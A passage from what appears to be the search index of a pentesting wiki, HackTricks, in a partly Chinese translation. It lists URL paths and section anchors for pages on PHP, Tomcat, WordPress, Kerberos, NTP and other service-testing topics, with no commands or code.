esting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#disable_functions--open_basedir","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#open_basedir-bypass","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#使用-glob-绕过列出目录","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#完全绕过-open_basedir-利用-fastcgi","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#disable_functions-绕过","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#自动绕过发现","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#使用其他系统函数绕过","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#ld_preload-绕过","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#使用-php-功能的绕过","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#模块版本依赖的绕过","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#自动工具","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#其他有趣的-php-函数","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#接受回调的函数列表","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#信息泄露","network
-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#其他","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#文件系统函数","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.html#disable_functions-bypass---php-fpmfastcgi","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.html#php-fpm","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.html#但-cgi-和-fastcgi-是什么","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.html#cgi","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.html#fastcgi","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.html#disable_functions-bypass","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.html#通过-gopherus","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.html#php-漏洞","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.html#fuckfastgci","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypa
ss/disable_functions-bypass-php-fpm-fastcgi.html#php-fpm-远程代码执行漏洞-cve-201911043","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.html#攻击者采取的步骤","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.html#编译自定义扩展的注意事项","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.html#自定义扩展文件","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.html#构建扩展","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.html#在受害者主机上上传和执行","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.html#命令执行","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.html#disable_functions-bypass---php-70-74-nix-only","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.html#php-70-74-nix-only","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.html#imagick--54---disable_functions--bypass","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.html#为什么它有效","network-services-pentesting/pentesting-web/
php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.html#2025-状态--仍然--相关","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.html#现代有效载荷变体","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.html#快速检测与枚举","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.html#缓解措施","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.html#参考文献","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.html#php-5x-shellshock-漏洞利用","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.html#php-524-ioncube-扩展漏洞","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.html#php--529-在-windows-上","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.html#php-524-和-525-php-curl","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environme
nt-exploit.html#通过-proc_open-和自定义环境利用绕过-php-safe_mode","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.html#php-perl-扩展-safe_mode-绕过漏洞","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.html#php-523---win32std-ext-保护绕过","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.html#php-52---fopen-漏洞","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.html#通过内存","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.html#mod_cgi","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.html#php-4--420-php-5-pcntl_exec","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#php---rce-利用对象创建-new-_get-a","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#介绍","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#rce-通过自定义类或自动加载","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#通过内置类实现-rce","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#ssrf--phar-deserialization","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-objec
t-creation-new-usd_get-a-usd_get-b.html#利用-pdos","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#soapclientsimplexmlelement-xxe","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#通过-imagick-extension-实现-rce","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#vid-解析器","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#php-crash--brute-force","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#format-string-in-class-name-resolution-php-700-bug-71105","network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.html#references","network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.html#php-ssrf","network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.html#ssrf-php-函数","network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.html#wordpress-ssrf通过dns重绑定","network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.html#crlf","network-services-pentesting/pentesting-web/prestashop.html#prestashop","network-services-pentesting/pentesting-web/prestashop.html#从-xss-到-rce","network-services-pentesting/pentesting-web/python.html#python","network-services-pentesting/pentesting-web/python.html#使用-python-的服务器","network-services-pentesting/pentesting-web/python.html#tricks","network-services-pentesting/pentesting-web/rocket-chat.html#rocket-chat","network-services-pentesting/pentesting-web/rocket-chat.html#rce","network-services-pentesting/pentesting-web/ruby-tricks.html#ruby-tricks","network-services-pentesting/pentesting-web/ruby-tricks.html#file-upload-to-rce","network-services-pentesting/pentesting-web/ruby-tricks.html#active-storage-image-
transformation--command-execution-cve-2025-24293","network-services-pentesting/pentesting-web/ruby-tricks.html#rackstatic-lfi--path-traversal-cve-2025-27610","network-services-pentesting/pentesting-web/ruby-tricks.html#forgingdecrypting-rails-cookies-when-secret_key_base-is-leaked","network-services-pentesting/pentesting-web/ruby-tricks.html#另请参阅rubyrails-特定漏洞","network-services-pentesting/pentesting-web/ruby-tricks.html#参考资料","network-services-pentesting/pentesting-web/code-review-tools.html#源代码审查--sast-工具","network-services-pentesting/pentesting-web/code-review-tools.html#指导和工具列表","network-services-pentesting/pentesting-web/code-review-tools.html#多语言工具","network-services-pentesting/pentesting-web/code-review-tools.html#naxus---ai-gents","network-services-pentesting/pentesting-web/code-review-tools.html#semgrep","network-services-pentesting/pentesting-web/code-review-tools.html#sonarqube","network-services-pentesting/pentesting-web/code-review-tools.html#codeql","network-services-pentesting/pentesting-web/code-review-tools.html#snyk","network-services-pentesting/pentesting-web/code-review-tools.html#insider","network-services-pentesting/pentesting-web/code-review-tools.html#deepsource","network-services-pentesting/pentesting-web/code-review-tools.html#nodejs","network-services-pentesting/pentesting-web/code-review-tools.html#electron","network-services-pentesting/pentesting-web/code-review-tools.html#python","network-services-pentesting/pentesting-web/code-review-tools.html#net","network-services-pentesting/pentesting-web/code-review-tools.html#rust","network-services-pentesting/pentesting-web/code-review-tools.html#java","network-services-pentesting/pentesting-web/code-review-tools.html#go","network-services-pentesting/pentesting-web/code-review-tools.html#php","network-services-pentesting/pentesting-web/code-review-tools.html#wordpress-插件","network-services-pentesting/pentesting-web/code-review-tools.html#solidity","network-services-pentesting/pentesting-web/code
-review-tools.html#javascript","network-services-pentesting/pentesting-web/code-review-tools.html#发现","network-services-pentesting/pentesting-web/code-review-tools.html#静态分析","network-services-pentesting/pentesting-web/special-http-headers.html#特殊-http-头","network-services-pentesting/pentesting-web/special-http-headers.html#字典--工具","network-services-pentesting/pentesting-web/special-http-headers.html#用于修改来源位置的-headers","network-services-pentesting/pentesting-web/special-http-headers.html#hop-by-hop-headers","network-services-pentesting/pentesting-web/special-http-headers.html#http-request-smuggling","network-services-pentesting/pentesting-web/special-http-headers.html#the-expect-header","network-services-pentesting/pentesting-web/special-http-headers.html#缓存相关-headers","network-services-pentesting/pentesting-web/special-http-headers.html#条件请求","network-services-pentesting/pentesting-web/special-http-headers.html#range-请求","network-services-pentesting/pentesting-web/special-http-headers.html#消息体信息","network-services-pentesting/pentesting-web/special-http-headers.html#服务器信息","network-services-pentesting/pentesting-web/special-http-headers.html#控制相关","network-services-pentesting/pentesting-web/special-http-headers.html#下载","network-services-pentesting/pentesting-web/special-http-headers.html#安全标头","network-services-pentesting/pentesting-web/special-http-headers.html#内容安全策略-csp","network-services-pentesting/pentesting-web/special-http-headers.html#trusted-types","network-services-pentesting/pentesting-web/special-http-headers.html#x-content-type-options","network-services-pentesting/pentesting-web/special-http-headers.html#x-frame-options","network-services-pentesting/pentesting-web/special-http-headers.html#跨源资源策略-corp-和-跨源资源共享-cors","network-services-pentesting/pentesting-web/special-http-headers.html#跨源嵌入策略-coep-和-跨源打开策略-coop","network-services-pentesting/pentesting-web/special-http-headers.html#http-strict-transport-security-hsts","network-services-pentesting/pentes
ting-web/special-http-headers.html#header-name-casing-bypass","network-services-pentesting/pentesting-web/special-http-headers.html#利用该绕过","network-services-pentesting/pentesting-web/special-http-headers.html#示例apache-camel-exec-rce-cve-2025-27636","network-services-pentesting/pentesting-web/special-http-headers.html#检测与缓解","network-services-pentesting/pentesting-web/special-http-headers.html#references","network-services-pentesting/pentesting-web/spring-actuators.html#spring-actuators","network-services-pentesting/pentesting-web/spring-actuators.html#spring-auth-bypass","network-services-pentesting/pentesting-web/spring-actuators.html#exploiting-spring-boot-actuators","network-services-pentesting/pentesting-web/spring-actuators.html#要点","network-services-pentesting/pentesting-web/spring-actuators.html#利用技术","network-services-pentesting/pentesting-web/spring-actuators.html#附加信息","network-services-pentesting/pentesting-web/spring-actuators.html#相关主题","network-services-pentesting/pentesting-web/spring-actuators.html#heapdump-secrets-mining-credentials-tokens-internal-urls","network-services-pentesting/pentesting-web/spring-actuators.html#abusing-actuator-loggerslogging-to-capture-credentials","network-services-pentesting/pentesting-web/spring-actuators.html#references","network-services-pentesting/pentesting-web/symphony.html#symfony","network-services-pentesting/pentesting-web/symphony.html#recon--enumeration","network-services-pentesting/pentesting-web/symphony.html#finger-printing","network-services-pentesting/pentesting-web/symphony.html#interesting-files--endpoints","network-services-pentesting/pentesting-web/symphony.html#high-impact-vulnerabilities-2023-2025","network-services-pentesting/pentesting-web/symphony.html#1-app_secret-disclosure--rce-via-_fragment-aka-secret-fragment","network-services-pentesting/pentesting-web/symphony.html#2-windows-process-hijack--cve-2024-51736","network-services-pentesting/pentesting-web/symphony.html#3-session-fixation--cve-202
3-46733","network-services-pentesting/pentesting-web/symphony.html#4-twig-sandbox-xss--cve-2023-46734","network-services-pentesting/pentesting-web/symphony.html#5-symfony-1-gadget-chains-仍在遗留应用中发现","network-services-pentesting/pentesting-web/symphony.html#exploitation-cheat-sheet","network-services-pentesting/pentesting-web/symphony.html#calculate-hmac-token-for-_fragment","network-services-pentesting/pentesting-web/symphony.html#暴力破解弱-app_secret","network-services-pentesting/pentesting-web/symphony.html#通过暴露的-symfony-console-进行-rce","network-services-pentesting/pentesting-web/symphony.html#防御性注意事项","network-services-pentesting/pentesting-web/symphony.html#有用的攻击工具","network-services-pentesting/pentesting-web/symphony.html#参考","network-services-pentesting/pentesting-web/tomcat/index.html#tomcat","network-services-pentesting/pentesting-web/tomcat/index.html#discovery","network-services-pentesting/pentesting-web/tomcat/index.html#enumeration","network-services-pentesting/pentesting-web/tomcat/index.html#版本识别","network-services-pentesting/pentesting-web/tomcat/index.html#管理文件位置","network-services-pentesting/pentesting-web/tomcat/index.html#用户名枚举","network-services-pentesting/pentesting-web/tomcat/index.html#默认凭据","network-services-pentesting/pentesting-web/tomcat/index.html#暴力攻击","network-services-pentesting/pentesting-web/tomcat/index.html#common-vulnerabilities","network-services-pentesting/pentesting-web/tomcat/index.html#密码回溯泄露","network-services-pentesting/pentesting-web/tomcat/index.html#双重-url-编码","network-services-pentesting/pentesting-web/tomcat/index.html#examples","network-services-pentesting/pentesting-web/tomcat/index.html#路径遍历漏洞","network-services-pentesting/pentesting-web/tomcat/index.html#rce","network-services-pentesting/pentesting-web/tomcat/index.html#限制","network-services-pentesting/pentesting-web/tomcat/index.html#metasploit","network-services-pentesting/pentesting-web/tomcat/index.html#msfvenom-反向-shell","network-services-pentesting/pentesting-web/
tomcat/index.html#使用--tomcatwardeployerpy--进行绑定和反向-shell","network-services-pentesting/pentesting-web/tomcat/index.html#使用--culsterd","network-services-pentesting/pentesting-web/tomcat/index.html#手动方法---web-shell","network-services-pentesting/pentesting-web/tomcat/index.html#手动方法-2","network-services-pentesting/pentesting-web/tomcat/index.html#post","network-services-pentesting/pentesting-web/tomcat/index.html#其他-tomcat-扫描工具","network-services-pentesting/pentesting-web/tomcat/index.html#参考文献","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#uncovering-cloudflare","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#common-techniques-to-uncover-cloudflare","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#tools-to-uncover-cloudflare","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#从云基础设施中揭示cloudflare","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#通过-cloudflare-绕过-cloudflare","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#认证源拉取","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#允许列表-cloudflare-ip-地址","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#绕过-cloudflare-进行抓取","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#缓存","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#工具","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#cloudflare-解算器","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#加固的无头浏览器","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#带有-cloudflare-内置绕过的智能代理","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#逆向工程-cloudflare-反机器人保护","network-services-pentesting/pentesting-web/uncovering-cloudflare.html#参考文献","network-services-pentesting/pentesting-web/vuejs.html#vuejs","network-services-pentesting/pentesting-web/vuejs.html#vuejs中的xss漏洞","network-services-pentes
ting/pentesting-web/vuejs.html#v-html指令","network-services-pentesting/pentesting-web/vuejs.html#v-bind-with-src-or-href","network-services-pentesting/pentesting-web/vuejs.html#v-on-与用户控制的处理程序","network-services-pentesting/pentesting-web/vuejs.html#动态属性--事件名称","network-services-pentesting/pentesting-web/vuejs.html#动态组件-","network-services-pentesting/pentesting-web/vuejs.html#不可信的模板在ssr中","network-services-pentesting/pentesting-web/vuejs.html#过滤器--渲染函数的-eval","network-services-pentesting/pentesting-web/vuejs.html#vue项目中的其他常见漏洞","network-services-pentesting/pentesting-web/vuejs.html#插件中的原型污染","network-services-pentesting/pentesting-web/vuejs.html#使用-vue-router-的开放重定向","network-services-pentesting/pentesting-web/vuejs.html#csrf-in-axios--fetch","network-services-pentesting/pentesting-web/vuejs.html#click-jacking","network-services-pentesting/pentesting-web/vuejs.html#content-security-policy-pitfalls","network-services-pentesting/pentesting-web/vuejs.html#供应链攻击-node-ipc--2022年3月","network-services-pentesting/pentesting-web/vuejs.html#加固检查清单","network-services-pentesting/pentesting-web/vuejs.html#参考资料","network-services-pentesting/pentesting-web/vmware-esx-vcenter....html#枚举","network-services-pentesting/pentesting-web/vmware-esx-vcenter....html#暴力破解","network-services-pentesting/pentesting-web/web-api-pentesting.html#web-api-pentesting","network-services-pentesting/pentesting-web/web-api-pentesting.html#api-pentesting-methodology-summary","network-services-pentesting/pentesting-web/web-api-pentesting.html#understanding-api-types","network-services-pentesting/pentesting-web/web-api-pentesting.html#practice-labs","network-services-pentesting/pentesting-web/web-api-pentesting.html#effective-tricks-for-api-pentesting","network-services-pentesting/pentesting-web/web-api-pentesting.html#tools-and-resources-for-api-pentesting","network-services-pentesting/pentesting-web/web-api-pentesting.html#学习和实践资源","network-services-pentesting/pentesting-web/web-api-pentesting.html#参考","net
work-services-pentesting/pentesting-web/put-method-webdav.html#webdav","network-services-pentesting/pentesting-web/put-method-webdav.html#davtest","network-services-pentesting/pentesting-web/put-method-webdav.html#cadaver","network-services-pentesting/pentesting-web/put-method-webdav.html#put-请求","network-services-pentesting/pentesting-web/put-method-webdav.html#move-请求","network-services-pentesting/pentesting-web/put-method-webdav.html#iis56-webdav-漏洞","network-services-pentesting/pentesting-web/put-method-webdav.html#后凭证","network-services-pentesting/pentesting-web/put-method-webdav.html#参考","network-services-pentesting/pentesting-web/werkzeug.html#werkzeug--flask-debug","network-services-pentesting/pentesting-web/werkzeug.html#console-rce","network-services-pentesting/pentesting-web/werkzeug.html#pin-保护---路径遍历","network-services-pentesting/pentesting-web/werkzeug.html#werkzeug-控制台-pin-漏洞","network-services-pentesting/pentesting-web/werkzeug.html#werkzeug-unicode-字符","network-services-pentesting/pentesting-web/werkzeug.html#自动化利用","network-services-pentesting/pentesting-web/werkzeug.html#参考文献","network-services-pentesting/pentesting-web/wordpress.html#wordpress","network-services-pentesting/pentesting-web/wordpress.html#基本信息","network-services-pentesting/pentesting-web/wordpress.html#主要的-wordpress-文件","network-services-pentesting/pentesting-web/wordpress.html#用户权限","network-services-pentesting/pentesting-web/wordpress.html#被动枚举","network-services-pentesting/pentesting-web/wordpress.html#获取-wordpress-版本","network-services-pentesting/pentesting-web/wordpress.html#获取插件","network-services-pentesting/pentesting-web/wordpress.html#获取主题","network-services-pentesting/pentesting-web/wordpress.html#通用提取版本","network-services-pentesting/pentesting-web/wordpress.html#主动枚举","network-services-pentesting/pentesting-web/wordpress.html#plugins-and-themes","network-services-pentesting/pentesting-web/wordpress.html#用户","network-services-pentesting/pentesting-web/wordpress.html#xml-rp
c","network-services-pentesting/pentesting-web/wordpress.html#wp-cronphp-dos","network-services-pentesting/pentesting-web/wordpress.html#wp-jsonoembed10proxy---ssrf","network-services-pentesting/pentesting-web/wordpress.html#ssrf","network-services-pentesting/pentesting-web/wordpress.html#自动化工具","network-services-pentesting/pentesting-web/wordpress.html#通过覆盖一位获得访问","network-services-pentesting/pentesting-web/wordpress.html#面板-rce","network-services-pentesting/pentesting-web/wordpress.html#msf","network-services-pentesting/pentesting-web/wordpress.html#插件-rce","network-services-pentesting/pentesting-web/wordpress.html#php-插件","network-services-pentesting/pentesting-web/wordpress.html#uploading-and-activating-malicious-plugin","network-services-pentesting/pentesting-web/wordpress.html#从-xss-到-rce","network-services-pentesting/pentesting-web/wordpress.html#后利用","network-services-pentesting/pentesting-web/wordpress.html#wordpress-plugins-pentest","network-services-pentesting/pentesting-web/wordpress.html#attack-surface","network-services-pentesting/pentesting-web/wordpress.html#trusted-header-rest-impersonation-woocommerce-payments--561","network-services-pentesting/pentesting-web/wordpress.html#unauthenticated-arbitrary-file-deletion-via-wp_ajax_nopriv-litho-theme--30","network-services-pentesting/pentesting-web/wordpress.html#privilege-escalation-via-stale-role-restoration-and-missing-authorization-ase-view-admin-as-role","network-services-pentesting/pentesting-web/wordpress.html#unauthenticated-privilege-escalation-via-cookietrusted-user-switching-on-public-init-service-finder-sf-booking","network-services-pentesting/pentesting-web/wordpress.html#waf-considerations-for-wordpressplugin-cves","network-services-pentesting/pentesting-web/wordpress.html#wordpress-protection","network-services-pentesting/pentesting-web/wordpress.html#regular-updates","network-services-pentesting/pentesting-web/wordpress.html#安全插件","network-services-pentesting/pentesting-web/wordpress.html#
其他建议","network-services-pentesting/pentesting-web/wordpress.html#未认证的-sql-injection由于验证不足wp-job-portal--232","network-services-pentesting/pentesting-web/wordpress.html#unauthenticated-arbitrary-file-download--path-traversal-wp-job-portal--232","network-services-pentesting/pentesting-web/wordpress.html#参考资料","network-services-pentesting/pentesting-kerberos-88/index.html#88tcpudp---pentesting-kerberos","network-services-pentesting/pentesting-kerberos-88/index.html#基本信息","network-services-pentesting/pentesting-kerberos-88/index.html#要学习如何滥用-kerberos您应该阅读关于----active-directory---的帖子","network-services-pentesting/pentesting-kerberos-88/index.html#更多","network-services-pentesting/pentesting-kerberos-88/index.html#shodan","network-services-pentesting/pentesting-kerberos-88/index.html#ms14-068","network-services-pentesting/pentesting-kerberos-88/index.html#hacktricks-自动命令","network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.html#从windows中提取票证","network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.html#mimikatz","network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.html#rubeus","network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.html#参考","network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.html#linux中的凭证存储","network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.html#提取凭证","network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.html#参考文献","network-services-pentesting/pentesting-web/wsgi.html#wsgi-后渗透技巧","network-services-pentesting/pentesting-web/wsgi.html#wsgi-概述","network-services-pentesting/pentesting-web/wsgi.html#uwsgi-magic-variables-利用","network-services-pentesting/pentesting-web/wsgi.html#关键可利用变量","network-services-pentesting/pentesting-web/wsgi.html#ssrf--gopher-to","network-services-pentesting/pentesting-web/wsgi.html#攻击向量","network-services-pentesting/pentesting-
web/wsgi.html#利用示例","network-services-pentesting/pentesting-web/wsgi.html#uwsgi-协议结构","network-services-pentesting/pentesting-web/wsgi.html#post-exploitation-techniques","network-services-pentesting/pentesting-web/wsgi.html#1-persistent-backdoors","network-services-pentesting/pentesting-web/wsgi.html#2-信息泄露","network-services-pentesting/pentesting-web/wsgi.html#3-privilege-escalation","network-services-pentesting/pentesting-web/wsgi.html#参考资料","network-services-pentesting/pentesting-pop.html#110995---pentesting-pop","network-services-pentesting/pentesting-pop.html#基本信息","network-services-pentesting/pentesting-pop.html#枚举","network-services-pentesting/pentesting-pop.html#横幅抓取","network-services-pentesting/pentesting-pop.html#手动","network-services-pentesting/pentesting-pop.html#自动化","network-services-pentesting/pentesting-pop.html#pop3-暴力破解","network-services-pentesting/pentesting-pop.html#pop-语法","network-services-pentesting/pentesting-pop.html#记录密码","network-services-pentesting/pentesting-pop.html#hacktricks-自动命令","network-services-pentesting/pentesting-rpcbind.html#111tcpudp---pentesting-portmapper","network-services-pentesting/pentesting-rpcbind.html#基本信息","network-services-pentesting/pentesting-rpcbind.html#枚举","network-services-pentesting/pentesting-rpcbind.html#shodan","network-services-pentesting/pentesting-rpcbind.html#rpcbind--nfs","network-services-pentesting/pentesting-rpcbind.html#nis","network-services-pentesting/pentesting-rpcbind.html#nif-文件","network-services-pentesting/pentesting-rpcbind.html#rpc-用户","network-services-pentesting/pentesting-rpcbind.html#绕过过滤的-portmapper-端口","network-services-pentesting/pentesting-rpcbind.html#shodan-1","network-services-pentesting/pentesting-rpcbind.html#实践实验室","network-services-pentesting/pentesting-rpcbind.html#hacktricks-自动命令","network-services-pentesting/113-pentesting-ident.html#113---pentesting-ident","network-services-pentesting/113-pentesting-ident.html#基本信息","network-services-pentesting/113-pentesting-ident.h
tml#枚举","network-services-pentesting/113-pentesting-ident.html#手动---获取用户识别服务","network-services-pentesting/113-pentesting-ident.html#nmap","network-services-pentesting/113-pentesting-ident.html#ident-user-enum","network-services-pentesting/113-pentesting-ident.html#shodan","network-services-pentesting/113-pentesting-ident.html#文件","network-services-pentesting/113-pentesting-ident.html#hacktricks-自动命令","network-services-pentesting/pentesting-ntp.html#123udp---pentesting-ntp","network-services-pentesting/pentesting-ntp.html#基本信息","network-services-pentesting/pentesting-ntp.html#摘要与安全提示","network-services-pentesting/pentesting-ntp.html#枚举","network-services-pentesting/pentesting-ntp.html#经典-ntpd--ntpq--ntpdc","network-services-pentesting/pentesting-ntp.html#chrony--chronyc-在大多数现代linux发行版中","network-services-pentesting/pentesting-ntp.html#nmap","network-services-pentesting/pentesting-ntp.html#大规模互联网扫描","network-services-pentesting/pentesting-ntp.html#检查配置文件","network-services-pentesting/pentesting-ntp.html#最近的漏洞-2023-2025","network-services-pentesting/pentesting-ntp.html#高级攻击","network-services-pentesting/pentesting-ntp.html#1-ntp-放大--反射","network-services-pentesting/pentesting-ntp.html#2-时间偏移--延迟攻击-khronos--chronos-研究","network-services-pentesting/pentesting-ntp.html#3-nts-滥用与-4460tcp-暴露","network-services-pentesting/pentesting-ntp.html#加固--最佳当前实践-bcp-233--rfc-8633","network-services-pentesting/pentesting-ntp.html#shodan--censys-dorks","network-services-pentesting/pentesting-ntp.html#有用的工具","network-services-pentesting/pentesting-ntp.html#hacktricks-自动命令","network-services-pentesting/pentesting-ntp.html#参考文献","network-services-pentesting/135-pentestin